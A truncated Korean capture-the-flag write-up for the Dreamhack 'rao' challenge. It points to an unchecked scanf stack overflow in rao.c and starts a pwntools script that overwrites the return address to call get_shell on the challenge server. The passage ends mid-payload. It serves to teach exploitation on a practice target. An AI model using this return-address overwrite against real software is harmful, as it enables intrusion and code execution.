문제 파일 다운 후 rao.c 파일을 열어보면 25번째 줄에 Stack Buffer Overflow 취약점이 있는 함수인 scanf를 찾을 수 있음. 입력된 데이터를 buf 배열에 저장하는데 배열의 크기에 비해 입력된 데이터의 길이를 검사하지 않으므로, 이 버그를 활용. from pwn import *# 원격 서버 정보p = remote('host3.dreamhack.games', 10962)# 바이너리 파일 로드elf = ELF('./rao')# get_shell 함수 주소 가져오기get_shell = elf.symbols['get_shell']# 페이로드 구성payload = b'A' * 0x28 # buf 크기만큼 채움 (40 bytes)payload += b'B' * 8 # 리턴 주소 덮..
